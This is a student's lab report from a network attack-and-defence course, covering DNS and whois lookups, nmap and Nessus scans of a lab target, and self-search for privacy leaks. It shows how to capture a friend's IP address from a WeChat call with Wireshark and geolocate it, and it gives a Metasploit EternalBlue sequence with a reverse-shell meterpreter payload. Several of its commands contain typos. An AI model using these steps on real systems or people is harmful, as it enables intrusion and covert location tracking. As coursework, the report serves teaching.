20222315 2024-2025-1 《网络与系统攻防技术》实验五实验报告

1、实验内容

1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

DNS注册人及联系方式

该域名对应IP地址

IP地址注册人及联系方式

IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机IP地址是否活跃

靶机开放了哪些TCP和UDP端口

靶机安装了什么操作系统,版本是多少

靶机上安装了哪些服务

(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机上开放了哪些端口

靶机各个端口上网络服务存在哪些安全漏洞

你认为如何攻陷靶机环境,以获得系统访问权

(5)①通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。

    ②并练习使用Google hack搜集技能完成搜索(至少10种搜索方法) 

2、实验过程

2.1从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息

2.1.1DNS注册人及联系方式
命令:who1s sina.com.cn

我们可以看到对应的注册人:北京新浪互联信息服务有限公司
联系方式:domainname@staff.sina.com.cn
2.1.2该域名对应IP地址
命令:nslookup sina.com.cn

我们可以看到对应的ip信息
使用dig+域名我们也可以查看到ip
dig是一个在Unix、Linux等类似系统上用于查询DNS域名服务器的命令行工具。它的全称为“Domain Information Groper”,dig支持各种类型的DNS查询,包括获取域名对应的IP地址、查找域名的MX、记录查询域名的NS记录等。还可以指定要查询的DNS服务器和端口,并提供详细的查询结果,包括响应时间、响应的权威性等信息。dig的使用方式非常灵活,可以通过不同的选项来定制查询的方式和结果的显示格式。

尝试使用命令traceroute sina.com.cn进行路由侦查

运行后我发现路径第一条是我本机的ip其他均不可见,这可能是由于中间路由器或目标服务器对ICMP消息进行了阻止或过滤,(traceroute使用的是UDP包,但路由器返回ICMP消息)导致无法获得完整的路由路径信息。
2.1.3IP地址注册人及联系方式
使用whois 110.242.68.66对目标ip进行反查

我们可以看到注册人sun ying和电话号码和IP地址所具体地理位置
2。1.4IP地址所在国家、城市和具体地理位置
使用在线工具进行查询

2.2尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

打开电脑的资源监视器,于此同时拨打朋友电话

我们可以看到资源监视器中监视到了大量来源于wechat的网络活动。
接着打开wireshark进行抓包

我们可以看到大量113.201.42.43的通信
打开在线工具对ip地址的属地进行查询

ip对应的地理位置与我朋友所在位置相符
对抓包中另一条大量出现的ip进行查询,也就是我的ip

我们可以看到我们学校的位置

2.3使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

2.3.1靶机IP地址是否活跃
首先查询我的kali的ip和靶机ip


接着输入命令nmap -sP 192.168.15.0/24对我们虚拟机和靶机所在网段进行探测

我们可以看到我们虚拟机的ip和靶机ip都处于up(活跃)状态
2.3.2靶机开放了哪些TCP和UDP端口
使用nmap -sU -sT +ip查看开放的tcp和udp端口

2.3.3靶机安装了什么操作系统,版本是多少
命令:nmap -0 192.168.15.133

但是这里没有办法直接看到操作系统,所以我换到我的主机上进行探测

这里我们成功看到操作系统的类型和版本号
2.3.4靶机上安装了哪些服务
使用命令:nmap -sv -Pn 192.168.15.133

可以看出每个端口后面都显示了端口的服务和版本

2.4使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

Nessus是一款知名的网络漏洞扫描工具,用于评估计算机系统、网络设备和应用程序中存在的安全漏洞。Nessus通过扫描目标系统并分析其安全配置,检测系统中可能存在的漏洞。
具体安装过程参考:https://blog.csdn.net/weixin_47510592/article/details/118192982
进行相关的安装操作



2.4.1靶机上开放了哪些端口
安装好Nessus,创建自己的scan

我们可以看到靶机的开放端口135、139、445等
2.4.2靶机各个端口上网络服务存在哪些安全漏洞
我们使用basic network scan来进行扫描

可以看到存在两个漏洞
2.4.3你认为如何攻陷靶机环境,以获得系统访问权
查询资料得知MB(Server Message Block)漏洞是一类与计算机网络协议相关的安全漏洞,通常会对使用SMB协议的系统和网络造成严重的安全风险。SMB协议主要用于在计算机网络中共享文件、打印机和其他资源,它广泛用于Windows操作系统中。攻击者通过利用这些漏洞可能会实施各种恶意行为,如远程代码执行、信息泄露、权限提升等。
步骤 1:识别SMB服务

使用Nmap或其他工具扫描目标主机的445端口,确认SMB服务是否开启。

bash
nmap -p 445 <target_ip>
步骤 2:检查SMB版本

使用Nmap的SMB版本探测功能来识别目标机器上运行的SMB协议版本。SMBv1通常更容易受到攻击。

bash
nmap -p 445 --script smb-os-fingerprint <target_ip>
步骤 3:漏洞扫描

使用Nmap的SMB漏洞扫描脚本,识别目标系统是否存在已知的漏洞。

bash
nmap --script smb-vuln* -p 445 <target_ip>
步骤 4:选择并利用漏洞

假设目标系统存在如EternalBlue这样的漏洞,你可以使用Metasploit框架来利用它:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit
步骤 5:获取访问权限

如果漏洞成功被利用,你将获得目标主机的系统访问权限。可以使用Meterpreter会话执行命令,如查看文件系统、提取敏感信息等。

2.5通过搜索引擎搜索自己在网上的足迹

首先检索自己的学号

可以看到之前的博客和3.15晚会
检索自己的名字

没有我得个人信息
学校+姓名

也没有我的信息






3.实验过程中遇到的问题及解决

问题一:第一次打微信电话捕获ip出现了大量错误的ip,和外地朋友打的通话,显示ip信息是北京联通,难道是因为我电话通过联通公司打过去会抓到途中的包
解决:我为此又抓了一次包,但这次ip信息正确,定位也符合那位朋友的位置
问题二:在下载nessus时并不是很顺利,在得到对应的激活码后,不知道怎么使用
解决:翻阅了多个教程网页,通过/opt/nessus/sbin/nessuscli fetch--challenge生成挑战码,最后根据提示登入对应网址

4.心得体会

通过这次实验,我深入了解了信息安全、网络漏洞扫描和隐私保护等方面的知识。在实践过程中,运用了WHOIS、DNS查询工具、Nmap、Nessus等多种工具,对域名、IP地址、靶机环境进行了详细的扫描和分析,发现了很多细节问题。这次实验不仅提升了我的技术能力,也让我更加重视网络安全和隐私保护。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/836923.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

编程命名规范(网文)

一个好的变量或函数命名,应该能起到自解释的作用,甚至能减少我们代码的注释。 naming-cheatsheet是一个命名备忘录,记录一些常见的规范约定,并提供简单的例子说明。如果能够严格遵守这些规范,相信我们的代码可读性会大大提升,下面就来介绍 naming-cheatsheet 提供的一些建…

MyBatis 学习笔记

MyBatis 执行器 JDBC 的执行过程分为四步:获取数据库连接(Connection) 预编译 SQL(PrepareStatement) 设置参数 执行 SQL(ResultSet)MyBatis 提供了执行器 Executor 将这一过程进行封装,对外提供 SqlSession 让用户通过调用其 API 直接操作数据库,因为 SqlSession 持有…

机器学习:线性回归

章节安排背景介绍 均方根误差MSE 最小二乘法 梯度下降 编程实现背景生活中大多数系统的输入输出关系为线性函数,或者在一定范围内可以近似为线性函数。在一些情形下,直接推断输入与输出的关系是较为困难的。因此,我们会从大量的采样数据中推导系统的输入输出关系。典型的单输…

20222322 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容 掌握使用Metasploit和nmap等工具进行前期渗透的方法,并利用四种特定的漏洞对靶机进行攻击。 (1)掌握Metasploit和nmap的用法 学习并熟悉Metasploit框架的基本操作,包括模块搜索(Search)、使用(Use)、展示选项(Show)、设置参数(Set)以及执行攻击(Exploi…

ETL之kettle 专业陪伴群,1元开启kettle精进之旅

1、为啥收取1元? 确保只有真正感兴趣或有意愿的用户才会加入。减少无关人员的加入,保持群组的专业性和活跃度。 付费入群可以减少垃圾信息的发送,因为发垃圾信息的人不太可能愿意为发送广告付费。 2、送人玫瑰手留余香自从公众号连载了90+篇关于kettle的干活文章,不到半年时…

SpringBoot:SpringBoot集成E-mail邮件发送功能

前言今天做项目时有个需求是:用公司邮箱给客户发送邮件通知,然后上网冲浪找到一些不错的文章,通过优化并实现功能后,写这篇文章记录一下,也提供给大家做参考。 前期准备 在编写代码前,我们需要获取到一些信息用于后续邮件发送功能,需要获取的信息为:协议服务器地址、邮…

控制之美1-第七章 PID控制

目录7.1 引子7.2 比例控制 7.1 引子 \[7000 \frac{dx(t)}{dt}+10ax(t)=u(t)+d(t) \]\(u(t)\) 是体重变化, \(u(t)=E_i-E_a\), \(E_i\) 是热 量摄入 ,\(E_a\) 是运动消耗, \(x(t)\) 系统输出,体重 \(a\)是劳动强度系数 \(d(t)=-aC\) 是扰动量 进行拉普拉斯变换 \[7000(sX(s)-…

基于 LLM 的智能运维 Agent 系统设计与实现

摘要 本文详细介绍了一个基于大语言模型(LLM)的智能运维 Agent 系统的设计与实现。该系统采用多 Agent 协同的架构,通过事件驱动的方式实现了自动化运维流程。系统集成了先进的 AI 能力,能够实现故障自动诊断、预测性维护、知识沉淀等核心功能。 一、运维 Agent 架构设计 在设…

RCE_sample_ctf_questions(ing)

[广东强网杯 2021 团队组]love_Pokemon 考点:函数escapeshellarg/escapeshellcmd绕过正则匹配 文件查看指令+通配符绕过正则匹配点击查看代码<?php error_reporting(0); highlight_file(__FILE__); $dir = sandbox/ . md5($_SERVER[REMOTE_ADDR]) . /;if(!file_exists($di…

C# 注册Windows服务

环境:.NET Farmework 4.7.2 IDE:Visual Studio 2022 添加程序集引用: System.ServiceProcess System.Configuration.Install 右键项目,添加UpdateServices1类,让UpdateServices1继承ServiceBase(UpdateServices1换成自己的Services服务)编译过后如果需要更新服务代码,要…

20222321 2024-2025-1 《网络与系统攻防技术》 实验六实验报告

一、实验内容 本实践目标是掌握metasploit的用法。 、指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容: (1)前期渗透 ①主机发现(可用Aux中的arp_sweep,sea…

【刷题笔记】[BalticOI 2024] Portal

【刷题笔记】[BalticOI 2024] Portal \(Solution\) 先注意到,题目中的图形是许多的自相似图形,要求能满足要求的单位图形的最大面积 先考虑只有一维的情况, 设几个传送门的坐标为 \((a_i,0)\) ``` 发现将整个图形平移后答案不会改变,所以不妨把一个传送门移动到 \((0,0)\)…